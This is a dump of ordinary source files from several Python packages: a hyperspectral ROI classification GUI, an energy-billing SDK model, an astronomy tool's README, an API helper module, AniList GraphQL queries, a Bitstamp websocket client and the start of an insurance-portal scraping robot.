self.vbox.addWidget(self.ROIfileText)
self.vbox.addWidget(self.table_view)
self.vbox.addSpacing(5)
self.vbox.addWidget(self.SelectAllMethodsCheckBox)
self.vbox.addSpacing(5)
self.vbox.addWidget(line1)
self.vbox.addWidget(self.ClassMethodsSectionText)
self.vbox.addWidget(self.LDAclassificationCheckBox)
self.vbox.addWidget(self.QDAclassificationCheckBox)
self.vbox.addWidget(self.RFclassificationCheckBox)
self.vbox.addWidget(self.DTclassificationCheckBox)
self.vbox.addSpacing(10)
self.vbox.addWidget(line2)
self.vbox.addWidget(self.ScatterplotMethodsSectionText)
self.vbox.addWidget(self.ScatterplotPCACheckBox)
self.vbox.addWidget(self.ScatterplotLDACheckBox)
self.vbox.addSpacing(10)
self.vbox.addWidget(line3)
self.vbox.addWidget(self.btn_analysis)
# set as central widget and dock widget
self.setCentralWidget(self.widget_central)
# Add Menubar
mainMenu = self.menuBar()
fileMenu = mainMenu.addMenu("&File ")
fileMenu.addAction(openROIAction)
fileMenu.addAction(quitAction)
fileMenu = mainMenu.addMenu("&Plots ")
fileMenu.addAction(plotSelectedMeansAction)
fileMenu.addAction(plotMeansAction)
fileMenu = mainMenu.addMenu("&Classify Image ")
fileMenu.addAction(classifyImageAction)
def not_supportrd(self):
QMessageBox.information(self, "Not Supported","That functionality is not yet supported.")
def select_ROIs_message(self):
QMessageBox.information(self, "No ROIs Selected","At least two ROIs must be selected.\n To Select all ROIs use the top-left box in the table.")
def cancel(self):
sys.exit()
def plot_selected_means(self):
# determine the eselected ROIs
SelectedROIdata = {}
selected_rows = sorted(set(index.row() for index in
self.table_view.selectedIndexes()))
# return if not rows are selected
if len(selected_rows) < 1:
return
# plot the class means
fig, ax = plt.subplots()
for rowIdx in selected_rows:
key = self.table_view.item(rowIdx,3).text()
spectra = self.ROIdata[key].spectra
mean = np.mean(spectra,0)
std = np.std(spectra,0)
if len(self.wl) == len(mean):
wl = self.wl
else:
print('Number Band Mismatch: ('+self.ROIdata[key].name+')')
print('Number ROI Bands: '+str(len(mean)))
print('Number Image Bands: '+str(len(self.wl)))
wl = range(len(mean))
ax.plot(wl, mean, label=self.ROIdata[key].name, color=self.ROIdata[key].color/255.)
ax.fill_between(wl, mean-std, mean+std, alpha=0.2, color=self.ROIdata[key].color/255.)
ax.set(xlabel='Wavelength', title='Class Means +/- 1 Standard Deviation')
ax.legend()
plt.show()
def set_loading_progressbar(self, title, text):
self.progressDialog = QProgressDialog(self)
self.progressDialog.setMinimum(0)
self.progressDialog.setLabelText(text)
self.progressDialog.setMaximum(100)
self.progressDialog.setWindowTitle(title)
#self.dialog.setCancelButton(None)
self.progressDialog.setModal(True)
self.progressDialog.show()
def set_loading_progressbar2(self, title, text):
self.progressDialog = QProgressDialog("Operation in progress.", "Cancel", 0, 100)
def plot_all_means(self):
# plot the class means
fig, ax = plt.subplots()
for rowIdx in range(self.table_view.rowCount()):
key = self.table_view.item(rowIdx,3).text()
spectra = self.ROIdata[key].spectra
mean = np.mean(spectra,0)
std = np.std(spectra,0)
if len(self.wl) == len(mean):
wl = self.wl
else:
print('Number Band Mismatch: ')
print('Number ROI Bands: '+str(len(mean)))
print('Number Image Bands: '+str(len(self.wl)))
wl = range(len(mean))
ax.plot(wl, mean, label=self.ROIdata[key].name, color=self.ROIdata[key].color/255.)
ax.fill_between(wl, mean-std, mean+std, alpha=0.2, color=self.ROIdata[key].color/255.)
ax.set(xlabel='Wavelength', title='Class Means +/- 1 Standard Deviation')
ax.legend()
plt.show()
def SelectAllMethodsCheckBoxChanged(self):
if self.SelectAllMethodsCheckBox.isChecked():
self.LDAclassificationCheckBox.setChecked(True)
self.QDAclassificationCheckBox.setChecked(True)
self.RFclassificationCheckBox.setChecked(True)
self.DTclassificationCheckBox.setChecked(True)
self.ScatterplotPCACheckBox.setChecked(True)
self.ScatterplotLDACheckBox.setChecked(True)
else:
self.LDAclassificationCheckBox.setChecked(False)
self.QDAclassificationCheckBox.setChecked(False)
self.RFclassificationCheckBox.setChecked(False)
self.DTclassificationCheckBox.setChecked(False)
self.ScatterplotPCACheckBox.setChecked(False)
self.ScatterplotLDACheckBox.setChecked(False)
class ColorDelegate(QStyledItemDelegate):
def paint(self, painter, option, index):
color = index.data(Qt.UserRole)
option.palette.setColor(QPalette.Highlight, color)
QStyledItemDelegate.paint(self, painter, option, index)
def choose_ROI_file(self):
fname_ROI, extension = QFileDialog.getOpenFileName(self, 'Choose ROI csv file.', self.imageDir+"/", "CSV (*.csv)")
if fname_ROI == '':
return
# read the ROI data from the file
ok, self.ROIdata = read_roi_file(fname_ROI)
if not ok:
return
# ROI data was read, so set the file name in the GUI
self.ROIfileText.setText('ROI File: '+fname_ROI)
# determine the keys
keys = self.ROIdata.keys()
# set the number of rows to be number of ROIs
self.table_view.setRowCount(len(keys))
# fill in the data
for idx, key in enumerate(keys):
# name item
name = QTableWidgetItem(self.ROIdata[key].name)
name.setData(Qt.UserRole,QColor(100,130,155)) # sets the highlight color
self.table_view.setItem(idx, 0, name)
# color item
c = self.ROIdata[key].color
blank = QTableWidgetItem()
blank.setFlags(blank.flags() & ~Qt.ItemIsEditable)
blank.setBackground(QColor(c[0], c[1], c[2]))
blank.setData(Qt.UserRole,QColor(c[0], c[1], c[2])) # sets the highlight color
self.table_view.setItem(idx, 1,blank )
# number of points item
npts = QTableWidgetItem(str(self.ROIdata[key].npts))
npts.setFlags(npts.flags() & ~Qt.ItemIsEditable)
npts.setData(Qt.UserRole,QColor(100,130,155)) # sets the highlight color
self.table_view.setItem(idx, 2, npts)
# store the key for this ROI in the last item
ROIkey = QTableWidgetItem(key)
self.table_view.setItem(idx, 3, ROIkey)
self.table_view.setItemDelegate(self.ColorDelegate()) # sets the background colors when slected
self.wl = self.ROIdata[key].wl
def choose_WL_file(self):
fname_WL = QFileDialog.getOpenFileName(self, 'Choose Image file with wavelengths.')
if fname_WL == '':
return
try:
im = envi.open(fname_WL+'.hdr')
except:
# sometimes images are saved with ".img" or similar suffix that must be removed from header
im_fname_nosuffix = fname_WL[:fname_WL.rfind(".")]
self.im = envi.open(im_fname_nosuffix+'.hdr', fname_WL)
self.ROIfileText.setText('Image wl File: '+fname_WL)
self.wl = self.im.bands.centers
def full_analysis(self):
# determine the eselected ROIs
SelectedROIdata = {}
selected_rows = sorted(set(index.row() for index in
self.table_view.selectedIndexes()))
# return if not rows are selected
if len(selected_rows) < 2:
self.select_ROIs_message()
return
# build the ROI data for the selected rows
self.class_names = []
for rowIdx in selected_rows:
key = self.table_view.item(rowIdx,3).text()
name = self.table_view.item(rowIdx,0).text()
self.class_names.append(name)
SelectedROIdata[name] = self.ROIdata[key]
# determine which classification methods the user has selected
methods = []
if self.LDAclassificationCheckBox.isChecked():
methods.append('LDA')
if self.QDAclassificationCheckBox.isChecked():
methods.append('QDA')
if self.RFclassificationCheckBox.isChecked():
methods.append('RF')
# Compute the classificaiton analysis
self.learners, self.validation = classification.ROI_class_learner(SelectedROIdata, self.wl, methods)
self.classAnalysisResultsGUI = classificationResultsViewer.classAnalysisResultsGUI(parent=self, settings=self.settings)
self.classAnalysisResultsGUI.show()
# determine which plot methods the user has selected
methods = []
if self.ScatterplotPCACheckBox.isChecked():
methods.append('PCA')
if self.ScatterplotLDACheckBox.isChecked():
methods.append('LDA')
# create the requested plots
self.plot_data = classification.dimension_reduction_plots(SelectedROIdata, methods)
#self.classificationResultsViewer = classificationResultsViewer.classificationResultsViewer(settings=self.settings,
# methods=methods,
# learners=self.learners,
# validation=self.validation,
# plot_data=self.plot_data)
def classify_image(self):
# Select the image
prompt = 'Select an image'
if self.imageDir is None:
self.im_fname, extension = QFileDialog.getOpenFileName(self, prompt)
else:
try:
self.im_fname, extension = QFileDialog.getOpenFileName(self, prompt, self.imageDir)
except:
self.im_fname, extension = QFileDialog.getOpenFileName(self, prompt)
if self.im_fname == '':
return
dummy,ok = specTools.is_image_file(self.im_fname)
if not ok:
QMessageBox.warning(self,"File is not valid ENVI image",
"File Name: %s"%(os.path.basename(self.im_fname)))
return
self.imageDir = os.path.dirname(os.path.abspath(self.im_fname))
# load the image
try:
# this will work if the filename has no suffix
im_fname_nosuffix = self.im_fname
self.im = envi.open(self.im_fname+'.hdr')
except:
# this will work if the filename has a suffix
im_fname_nosuffix = self.im_fname[:self.im_fname.rfind(".")]
self.im = envi.open(im_fname_nosuffix+'.hdr', self.im_fname)
self.im_arr = specTools.envi_load(self.im)
[nRows,nCols,nBands] = np.shape(self.im_arr)
# check the bands
band_check = True
if nBands == len(self.wl):
if not (self.im.bands.centers == self.wl).all():
band_check = False
else:
band_check = False
if band_check == False:
QMessageBox.warning(self, "Band Mismatch","Image bands must match ROI spectra bands.")
return
class_results, prob_results = classification.image_calssification(self.im_arr, self.learners)
# save the classification results
for learnerMethod in self.learners.keys():
envi.save_classification(
im_fname_nosuffix+'_class_'+learnerMethod+'.hdr',
class_results[learnerMethod],
class_names = self.ROIdata.keys(),
class_colors = [self.ROIdata[key].color for key in self.ROIdata.keys()], force=True)
try:
envi.save_image(im_fname_nosuffix+'_probability_'+learnerMethod+'.hdr',
prob_results[learnerMethod],
metadata={'band names': self.ROIdata.keys(), 'default stretch': '0.500000 1.000000 linear'},
ext='', force=True)
except:
pass
if __name__ == "__main__":
app = QApplication(argv)
form = classAnalysisGUI()
form.show()
app.exec_() | PypiClean |
/EnergyCapSdk-8.2304.4743.tar.gz/EnergyCapSdk-8.2304.4743/energycap/sdk/models/abnormal_bill_cost_with_outlier_analysis_setting_response.py |
from msrest.serialization import Model
class AbnormalBillCostWithOutlierAnalysisSettingResponse(Model):
"""AbnormalBillCostWithOutlierAnalysisSettingResponse.
:param sensitivity: Minimum outlier sensitivity for abnormal cost analysis
Possible values - severe, high, moderate
If SettingStatus is set to Skip and no value is provided, EnergyCAP
default will be set
:type sensitivity: str
:param setting_status: The status of the audit setting - Possible values
Check, Hold, Skip
:type setting_status: str
:param setting_code: The setting code
:type setting_code: str
:param setting_description: A description of the setting
:type setting_description: str
:param minimum_cost: Minimum Bill/Meter Cost.
This audit wwill run only when the cost meets the specified minimum cost
:type minimum_cost: int
:param assignees: List of Assignees.
UserChildDTO representing the users the flag should get assigned to when
the audit fails.
:type assignees: list[~energycap.sdk.models.UserChild]
"""
_attribute_map = {
'sensitivity': {'key': 'sensitivity', 'type': 'str'},
'setting_status': {'key': 'settingStatus', 'type': 'str'},
'setting_code': {'key': 'settingCode', 'type': 'str'},
'setting_description': {'key': 'settingDescription', 'type': 'str'},
'minimum_cost': {'key': 'minimumCost', 'type': 'int'},
'assignees': {'key': 'assignees', 'type': '[UserChild]'},
}
def __init__(self, **kwargs):
super(AbnormalBillCostWithOutlierAnalysisSettingResponse, self).__init__(**kwargs)
self.sensitivity = kwargs.get('sensitivity', None)
self.setting_status = kwargs.get('setting_status', None)
self.setting_code = kwargs.get('setting_code', None)
self.setting_description = kwargs.get('setting_description', None)
self.minimum_cost = kwargs.get('minimum_cost', None)
self.assignees = kwargs.get('assignees', None) | PypiClean |
/K2ephem-1.5.1.tar.gz/K2ephem-1.5.1/README.md | # K2ephem [](https://pypi.python.org/pypi/K2ephem/) [](https://travis-ci.org/KeplerGO/K2ephem) [](http://dx.doi.org/10.5281/zenodo.44363)
***Checks whether a Solar System body is (or was) observable by [NASA's K2 mission](http://keplerscience.arc.nasa.gov).***
[NASA's K2 mission](http://keplerscience.arc.nasa.gov) is using
the unique assets of the repurposed Kepler space telescope
to perform long-baseline, high-cadence, high-precision photometry
of targets selected by the community.
Unlike the original Kepler mission, the loss of two reaction wheels
requires K2 to point near the ecliptic plane.
As a result, K2 can provide high-precision lightcurves
for large numbers of asteroids, comets, and (dwarf) planets.
This repository provides a command-line tool that uses the JPL/Horizons
service to check whether a Solar System body is (or was) in the footprint
of one of the past or future [K2 Campaign fields](http://keplerscience.arc.nasa.gov/k2-fields.html).
## Installation
You need to have a working version of Python installed.
If this requirement is met, you can install the latest stable version
of `K2ephem` using pip:
```
$ pip install K2ephem
```
If you have a previous version installed, you can upgrade it using:
```
pip install K2ephem --upgrade
```
Or you can install the most recent development version
from the git repository as follows:
```
$ git clone https://github.com/KeplerGO/K2ephem.git
$ cd K2ephem
$ python setup.py install
```
The `setup.py` script will automatically take care of installing two required dependencies (`K2fov` and `pandas`).
## Usage
After installation, you can call `K2ephem` from the command line.
For example, to verify whether comet *Chiron* can be observed by K2,
simply type:
```
K2ephem Chiron
```
Or you can type `K2ephem --help` to see the detailed usage instructions:
```
$ K2ephem --help
usage: K2ephem [-h] [--first campaign] [--last campaign] [-p] target
Check if a Solar System object is (or was) observable by NASA's K2 mission.
This command will query JPL/Horizons to find out.
positional arguments:
target Name of the target. Must be known to JPL/Horizons.
optional arguments:
-h, --help show this help message and exit
--first campaign First campaign to check (default: 0)
--last campaign Final campaign to check (default: 18)
-p, --plot Produce plot showing the object position with respect to
each campaign.
```
## Background
The [JPL/Horizons](http://ssd.jpl.nasa.gov/horizons.cgi)
ephemeris service allows users to predict the position
of Solar System bodies in the sky as seen from the Kepler/K2 spacecraft.
This can be achieved by entering `@-227` as the "Observer Location".
Setting the location to be the Kepler spacecraft is *crucial*,
because Kepler is more than 0.5 AU away from the Earth!
## Attribution
Created by Geert Barentsen for the NASA Kepler/K2 Guest Observer Office.
If this tool aided your research, please cite it using the [DOI identifier](http://dx.doi.org/10.5281/zenodo.44363)
or the following BibTeX entry:
```
@misc{geert_barentsen_2016_44363,
author = {Geert Barentsen},
title = {K2ephem: v1.1.1},
month = jan,
year = 2016,
doi = {10.5281/zenodo.44363},
url = {http://dx.doi.org/10.5281/zenodo.44363}
}
```
| PypiClean |
/Md-Notes-api-1.0.0.tar.gz/Md-Notes-api-1.0.0/mdnotes/api_helper.py | import re
import sys
import datetime
import calendar
import email.utils as eut
from time import mktime
import jsonpickle
import dateutil.parser
from requests.utils import quote
class APIHelper(object):
"""A Helper Class for various functions associated with API Calls.
This class contains static methods for operations that need to be
performed during API requests. All of the methods inside this class are
static methods, there is no need to ever initialise an instance of this
class.
"""
@staticmethod
def merge_dicts(dict1, dict2):
"""Merges two dictionaries into one as a shallow copy.
Args:
dict1 (dict): The first dictionary.
dict2 (dict): The second dictionary.
Returns:
dict: A dictionary containing key value pairs
from both the argument dictionaries. In the case
of a key conflict, values from dict2 are used
and those from dict1 are lost.
"""
temp = dict1.copy()
temp.update(dict2)
return temp
@staticmethod
def json_serialize(obj):
"""JSON Serialization of a given object.
Args:
obj (object): The object to serialize.
Returns:
str: The JSON serialized string of the object.
"""
if obj is None:
return None
# Resolve any Names if it's one of our objects that needs to have this called on
if isinstance(obj, list):
value = list()
for item in obj:
if hasattr(item, "_names"):
value.append(APIHelper.to_dictionary(item))
else:
value.append(item)
obj = value
else:
if hasattr(obj, "_names"):
obj = APIHelper.to_dictionary(obj)
return jsonpickle.encode(obj, False)
@staticmethod
def json_deserialize(json, unboxing_function=None, as_dict=False):
"""JSON Deserialization of a given string.
Args:
json (str): The JSON serialized string to deserialize.
Returns:
dict: A dictionary representing the data contained in the
JSON serialized string.
"""
if json is None:
return None
try:
decoded = jsonpickle.decode(json)
except ValueError:
return json
if unboxing_function is None:
return decoded
if as_dict:
return {k: unboxing_function(v) for k, v in decoded.items()}
elif isinstance(decoded, list):
return [unboxing_function(element) for element in decoded]
else:
return unboxing_function(decoded)
@staticmethod
def serialize_array(key, array, formatting="indexed"):
"""Converts an array parameter to a list of key value tuples.
Args:
key (str): The name of the parameter.
array (list): The value of the parameter.
formatting (str): The type of key formatting expected.
Returns:
list: A list with key value tuples for the array elements.
"""
tuples = []
if sys.version_info[0] < 3:
serializable_types = (str, int, long, float, bool, datetime.date, APIHelper.CustomDate)
else:
serializable_types = (str, int, float, bool, datetime.date, APIHelper.CustomDate)
if isinstance(array[0], serializable_types):
if formatting == "unindexed":
tuples += [("{0}[]".format(key), element) for element in array]
elif formatting == "indexed":
tuples += [("{0}[{1}]".format(key, index), element) for index, element in enumerate(array)]
elif formatting == "plain":
tuples += [(key, element) for element in array]
else:
raise ValueError("Invalid format provided.")
else:
tuples += [("{0}[{1}]".format(key, index), element) for index, element in enumerate(array)]
return tuples
@staticmethod
def append_url_with_template_parameters(url, parameters):
"""Replaces template parameters in the given url.
Args:
url (str): The query url string to replace the template parameters.
parameters (dict): The parameters to replace in the url.
Returns:
str: URL with replaced parameters.
"""
# Parameter validation
if url is None:
raise ValueError("URL is None.")
if parameters is None:
return url
# Iterate and replace parameters
for key in parameters:
value = parameters[key]['value']
encode = parameters[key]['encode']
replace_value = ''
# Load parameter value
if value is None:
replace_value = ''
elif isinstance(value, list):
replace_value = "/".join((quote(str(x), safe='') if encode else str(x)) for x in value)
else:
replace_value = quote(str(value), safe='') if encode else str(value)
url = url.replace('{{{0}}}'.format(key), str(replace_value))
return url
@staticmethod
def append_url_with_query_parameters(url,
parameters,
array_serialization="indexed"):
"""Adds query parameters to a URL.
Args:
url (str): The URL string.
parameters (dict): The query parameters to add to the URL.
array_serialization (str): The format of array parameter serialization.
Returns:
str: URL with added query parameters.
"""
# Parameter validation
if url is None:
raise ValueError("URL is None.")
if parameters is None:
return url
for key, value in parameters.items():
seperator = '&' if '?' in url else '?'
if value is not None:
if isinstance(value, list):
value = [element for element in value if element]
if array_serialization == "csv":
url += "{0}{1}={2}".format(
seperator,
key,
",".join(quote(str(x), safe='') for x in value)
)
elif array_serialization == "psv":
url += "{0}{1}={2}".format(
seperator,
key,
"|".join(quote(str(x), safe='') for x in value)
)
elif array_serialization == "tsv":
url += "{0}{1}={2}".format(
seperator,
key,
"\t".join(quote(str(x), safe='') for x in value)
)
else:
url += "{0}{1}".format(
seperator,
"&".join(("{0}={1}".format(k, quote(str(v), safe='')))
for k, v in APIHelper.serialize_array(key, value, array_serialization))
)
else:
url += "{0}{1}={2}".format(seperator, key, quote(str(value), safe=''))
return url
@staticmethod
def clean_url(url):
"""Validates and processes the given query Url to clean empty slashes.
Args:
url (str): The given query Url to process.
Returns:
str: Clean Url as string.
"""
# Ensure that the urls are absolute
regex = "^https?://[^/]+"
match = re.match(regex, url)
if match is None:
raise ValueError('Invalid Url format.')
protocol = match.group(0)
index = url.find('?')
query_url = url[len(protocol): index if index != -1 else None]
query_url = re.sub("//+", "/", query_url)
parameters = url[index:] if index != -1 else ""
return protocol + query_url + parameters
@staticmethod
def form_encode_parameters(form_parameters,
array_serialization="indexed"):
"""Form encodes a dictionary of form parameters
Args:
form_parameters (dictionary): The given dictionary which has
atleast one model to form encode.
array_serialization (str): The format of array parameter serialization.
Returns:
dict: A dictionary of form encoded properties of the model.
"""
encoded = []
for key, value in form_parameters.items():
encoded += APIHelper.form_encode(value, key, array_serialization)
return encoded
@staticmethod
def form_encode(obj,
instance_name,
array_serialization="indexed"):
"""Encodes a model in a form-encoded manner such as person[Name]
Args:
obj (object): The given Object to form encode.
instance_name (string): The base name to appear before each entry
for this object.
array_serialization (string): The format of array parameter serialization.
Returns:
dict: A dictionary of form encoded properties of the model.
"""
retval = []
# If we received an object, resolve it's field names.
if hasattr(obj, "_names"):
obj = APIHelper.to_dictionary(obj)
if obj is None:
return []
elif isinstance(obj, list):
for element in APIHelper.serialize_array(instance_name, obj, array_serialization):
retval += APIHelper.form_encode(element[1], element[0], array_serialization)
elif isinstance(obj, dict):
for item in obj:
retval += APIHelper.form_encode(obj[item], instance_name + "[" + item + "]", array_serialization)
else:
retval.append((instance_name, obj))
return retval
@staticmethod
def to_dictionary(obj):
"""Creates a dictionary representation of a class instance. The
keys are taken from the API description and may differ from language
specific variable names of properties.
Args:
obj: The object to be converted into a dictionary.
Returns:
dictionary: A dictionary form of the model with properties in
their API formats.
"""
dictionary = dict()
# Loop through all properties in this model
for name in obj._names:
value = getattr(obj, name)
if isinstance(value, list):
# Loop through each item
dictionary[obj._names[name]] = list()
for item in value:
dictionary[obj._names[name]].append(APIHelper.to_dictionary(item) if hasattr(item, "_names") else item)
elif isinstance(value, dict):
# Loop through each item
dictionary[obj._names[name]] = dict()
for key in value:
dictionary[obj._names[name]][key] = APIHelper.to_dictionary(value[key]) if hasattr(value[key], "_names") else value[key]
else:
dictionary[obj._names[name]] = APIHelper.to_dictionary(value) if hasattr(value, "_names") else value
# Loop through all additional properties in this model
for name in obj.additional_properties:
value = obj.additional_properties.get(name)
if isinstance(value, list):
# Loop through each item
dictionary[name] = list()
for item in value:
dictionary[name].append(APIHelper.to_dictionary(item) if hasattr(item, "additional_properties") else item)
elif isinstance(value, dict):
# Loop through each item
dictionary[name] = dict()
for key in value:
dictionary[name][key] = APIHelper.to_dictionary(value[key]) if hasattr(value[key], "additional_properties") else value[key]
else:
dictionary[name] = APIHelper.to_dictionary(value) if hasattr(value, "additional_properties") else value
# Return the result
return dictionary
@staticmethod
def when_defined(func, value):
return func(value) if value else None
class CustomDate(object):
""" A base class for wrapper classes of datetime.
This class contains methods which help in
appropriate serialization of datetime objects.
"""
def __init__(self, dtime, value=None):
self.datetime = dtime
if not value:
self.value = self.from_datetime(dtime)
else:
self.value = value
def __repr__(self):
return str(self.value)
def __getstate__(self):
return self.value
def __setstate__(self, state):
pass
class HttpDateTime(CustomDate):
""" A wrapper class for datetime to support HTTP date format."""
@classmethod
def from_datetime(cls, date_time):
return eut.formatdate(timeval=mktime(date_time.timetuple()),
localtime=False, usegmt=True)
@classmethod
def from_value(cls, value):
dtime = datetime.datetime.fromtimestamp(eut.mktime_tz(eut.parsedate_tz(value)))
return cls(dtime, value)
class UnixDateTime(CustomDate):
""" A wrapper class for datetime to support Unix date format."""
@classmethod
def from_datetime(cls, date_time):
return calendar.timegm(date_time.utctimetuple())
@classmethod
def from_value(cls, value):
dtime = datetime.datetime.utcfromtimestamp(float(value))
return cls(dtime, float(value))
class RFC3339DateTime(CustomDate):
""" A wrapper class for datetime to support Rfc 3339 format."""
@classmethod
def from_datetime(cls, date_time):
return date_time.isoformat()
@classmethod
def from_value(cls, value):
dtime = dateutil.parser.parse(value)
return cls(dtime, value) | PypiClean |
/Kadal-0.2.6.tar.gz/Kadal-0.2.6/kadal/query.py | MEDIA_SEARCH = """
query ($search: String, $type: MediaType, $exclude: MediaFormat, $isAdult: Boolean) {
Media(search: $search, type: $type, format_not: $exclude, isAdult: $isAdult) {
id
type
format
title {
english
romaji
native
}
synonyms
status
description
startDate {
year
month
day
}
endDate {
year
month
day
}
episodes
chapters
volumes
coverImage {
large
color
}
bannerImage
genres
averageScore
siteUrl
nextAiringEpisode {
timeUntilAiring
episode
}
}
}
"""
MEDIA_BY_ID = """
query ($id: Int, $type: MediaType) {
Media(id: $id, type: $type) {
id
type
format
title {
english
romaji
native
}
synonyms
status
description
startDate {
year
month
day
}
endDate {
year
month
day
}
episodes
chapters
coverImage {
large
color
}
bannerImage
genres
averageScore
siteUrl
nextAiringEpisode {
timeUntilAiring
episode
}
}
}
"""
MEDIA_PAGED = """
query (
$id: Int,
$page: Int,
$perPage: Int,
$search: String,
$type: MediaType,
$sort: [MediaSort] = [SEARCH_MATCH],
$exclude: MediaFormat,
$isAdult: Boolean
) {
Page(page: $page, perPage: $perPage) {
media(id: $id, search: $search, type: $type, sort: $sort, format_not: $exclude, isAdult: $isAdult) {
id
type
format
title {
english
romaji
native
}
synonyms
status
description
startDate {
year
month
day
}
endDate {
year
month
day
}
episodes
chapters
volumes
coverImage {
large
color
}
bannerImage
genres
averageScore
siteUrl
popularity
}
}
}
"""
USER_SEARCH = """
query ($search: String) {
User(search: $search) {
id
name
html_about: about(asHtml: true)
about
avatar {
large
}
bannerImage
siteUrl
stats {
watchedTime
chaptersRead
}
}
}
"""
USER_BY_ID = """
query ($id: Int) {
User(id: $id) {
id
name
html_about: about(asHtml: true)
about
avatar {
large
}
bannerImage
siteUrl
stats {
watchedTime
chaptersRead
}
}
}
""" | PypiClean |
/BuzzAlgoTrade-0.0.2.tar.gz/BuzzAlgoTrade-0.0.2/pyalgotrade/bitstamp/wsclient.py | import datetime
import threading
import Queue
from pyalgotrade.websocket import pusher
from pyalgotrade.bitstamp import common
def get_current_datetime():
return datetime.datetime.now()
# Bitstamp protocol reference: https://www.bitstamp.net/websocket/
class Trade(pusher.Event):
"""A trade event."""
def __init__(self, dateTime, eventDict):
super(Trade, self).__init__(eventDict, True)
self.__dateTime = dateTime
def getDateTime(self):
"""Returns the :class:`datetime.datetime` when this event was received."""
return self.__dateTime
def getId(self):
"""Returns the trade id."""
return self.getData()["id"]
def getPrice(self):
"""Returns the trade price."""
return self.getData()["price"]
def getAmount(self):
"""Returns the trade amount."""
return self.getData()["amount"]
def isBuy(self):
"""Returns True if the trade was a buy."""
return self.getData()["type"] == 0
def isSell(self):
"""Returns True if the trade was a sell."""
return self.getData()["type"] == 1
class OrderBookUpdate(pusher.Event):
"""An order book update event."""
def __init__(self, dateTime, eventDict):
super(OrderBookUpdate, self).__init__(eventDict, True)
self.__dateTime = dateTime
def getDateTime(self):
"""Returns the :class:`datetime.datetime` when this event was received."""
return self.__dateTime
def getBidPrices(self):
"""Returns a list with the top 20 bid prices."""
return [float(bid[0]) for bid in self.getData()["bids"]]
def getBidVolumes(self):
"""Returns a list with the top 20 bid volumes."""
return [float(bid[1]) for bid in self.getData()["bids"]]
def getAskPrices(self):
"""Returns a list with the top 20 ask prices."""
return [float(ask[0]) for ask in self.getData()["asks"]]
def getAskVolumes(self):
"""Returns a list with the top 20 ask volumes."""
return [float(ask[1]) for ask in self.getData()["asks"]]
class WebSocketClient(pusher.WebSocketClient):
PUSHER_APP_KEY = "de504dc5763aeef9ff52"
# Events
ON_TRADE = 1
ON_ORDER_BOOK_UPDATE = 2
ON_CONNECTED = 3
ON_DISCONNECTED = 4
def __init__(self):
super(WebSocketClient, self).__init__(WebSocketClient.PUSHER_APP_KEY, 5)
self.__queue = Queue.Queue()
def getQueue(self):
return self.__queue
def onMessage(self, msg):
# If we can't handle the message, forward it to Pusher WebSocketClient.
event = msg.get("event")
if event == "trade":
self.onTrade(Trade(get_current_datetime(), msg))
elif event == "data" and msg.get("channel") == "order_book":
self.onOrderBookUpdate(OrderBookUpdate(get_current_datetime(), msg))
else:
super(WebSocketClient, self).onMessage(msg)
######################################################################
# WebSocketClientBase events.
def onOpened(self):
pass
def onClosed(self, code, reason):
common.logger.info("Closed. Code: %s. Reason: %s." % (code, reason))
self.__queue.put((WebSocketClient.ON_DISCONNECTED, None))
def onDisconnectionDetected(self):
common.logger.warning("Disconnection detected.")
try:
self.stopClient()
except Exception, e:
common.logger.error("Error stopping websocket client: %s." % (str(e)))
self.__queue.put((WebSocketClient.ON_DISCONNECTED, None))
######################################################################
# Pusher specific events.
def onConnectionEstablished(self, event):
common.logger.info("Connection established.")
self.subscribeChannel("live_trades")
self.subscribeChannel("order_book")
self.__queue.put((WebSocketClient.ON_CONNECTED, None))
def onError(self, event):
common.logger.error("Error: %s" % (event))
def onUnknownEvent(self, event):
common.logger.warning("Unknown event: %s" % (event))
######################################################################
# Bitstamp specific
def onTrade(self, trade):
self.__queue.put((WebSocketClient.ON_TRADE, trade))
def onOrderBookUpdate(self, orderBookUpdate):
self.__queue.put((WebSocketClient.ON_ORDER_BOOK_UPDATE, orderBookUpdate))
class WebSocketClientThread(threading.Thread):
def __init__(self):
super(WebSocketClientThread, self).__init__()
self.__wsClient = WebSocketClient()
def getQueue(self):
return self.__wsClient.getQueue()
def start(self):
self.__wsClient.connect()
super(WebSocketClientThread, self).start()
def run(self):
self.__wsClient.startClient()
def stop(self):
try:
common.logger.info("Stopping websocket client.")
self.__wsClient.stopClient()
except Exception, e:
common.logger.error("Error stopping websocket client: %s." % (str(e))) | PypiClean |
/IPRA_SESG-3.20.51-py3-none-any.whl/ipra/Model/Robot/axaRobotOld.py | from ipra.Model.Robot.baseRobot import BaseRobot
from bs4 import BeautifulSoup
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import xlsxwriter
import threading
from genericpath import exists
class DeperacatedAxaRobot(BaseRobot):
def __init__(self, policyList, frame, reportPath,inputPath,downloadReport):
super().__init__(policyList, frame, reportPath,inputPath,downloadReport)
self.logger.writeLogString('AXA-INIT','ROBOT INIT')
self.maxPolicyListSize = len(policyList)
self.workbook = xlsxwriter.Workbook(self.reportPath+'AXA_report.xlsx')
self.worksheet = self.workbook.add_worksheet()
self.worksheet.write(0, 0, "Policy No.")
self.logger.writeLogString('AXA-INIT','maxPolicyListSize:'+str(self.maxPolicyListSize))
def waitingLoginComplete(self):
self.logger.writeLogString('AXA-LOGIN','START LOGIN')
# self.browser.get("https://www.axa.com.hk/zh/login#?Tab$login-tab=consultant-login")
# self.browser.find_element(By.XPATH,"/html/body/div/div/div[2]/div[3]/div/div/div[1]/div[2]/div[3]/div/div/div/div[2]/div/div[5]/div/div/button").click()
# self.browser.close()
# self.browser.switch_to.window(self.browser.window_handles[0])
url_link = "https://axaiprooffice.force.com/_ui/search/ui/UnifiedSearchResults?searchType=2&sen=a00&sen=001&sen=005&str=0"
self.browser.get(url_link)
self.frame.setStatusLableText(self.stringValue.waitingLogin.get())
while not self.isLogin and not self.isStopped:
try:
WebDriverWait(self.browser, 10).until(EC.presence_of_element_located((By.XPATH, "/html/body/div/div[4]/div/ul/li[1]/span")))
self.isLogin=True
except:
time.sleep(3)
else:
pass
if self.isLogin:
self.frame.setStatusLableText(self.stringValue.loginSuccess.get())
self.logger.writeLogString('AXA-LOGIN','LOGIN COMPLETED')
def scrapPolicy(self):
url_link = "https://axaiprooffice.force.com/_ui/search/ui/UnifiedSearchResults?searchType=2&sen=a00&sen=001&sen=005&str={}"
for policy in self.policyList:
if self.isStopped:
return
self.frame.setStatusLableText(self.stringValue.processing.get().format(str(policy)))
